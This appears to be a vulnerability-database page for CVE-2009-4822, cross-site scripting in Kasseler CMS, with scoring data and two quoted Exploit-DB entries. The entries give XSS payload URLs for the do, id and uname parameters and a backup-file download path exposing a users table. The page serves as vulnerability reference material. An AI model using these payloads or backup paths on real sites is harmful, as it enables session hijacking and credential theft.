CVE-2009-4822
published 2010-04-27CVE-2009-4822: Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kasseler CMS 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.46%
70.3th percentile
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kasseler CMS 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) do, (2) id, and (3) uname parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kasseler-cms | kasseler_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Kasseler CMS 2.0.5 - Bypass / Download Backup
exploitdb·2010-04-26
CVE-2009-4822 Kasseler CMS 2.0.5 - Bypass / Download Backup
Kasseler CMS 2.0.5 - Bypass / Download Backup
---
| # Title : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability
| # Author : indoushka
| # email : [email protected]
| # Dork : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug : Backup
====================== Exploit By indoushka =================================
# Exploit :
1 - http://127.0.0.1/kasseler/backup.php
File size: 37.38 KB
Tables processed: 39
Rows processed: 37
2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql
in lig 645:668 col 1 you found the login information
INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00
Exploit-DB
Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2009-12-21
CVE-2009-4822 Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities
Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/37435/info
Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected.
http://www.example.com/index.php?module=[target]&do=View&id=">alert();
http://www.example.com/index.php?module=[target]&do=">alert();
http://www.example.com/index.php?module=Account&do=UserInfo&uname=">alert();
No writeups or analysis indexed.
2010-04-27
Published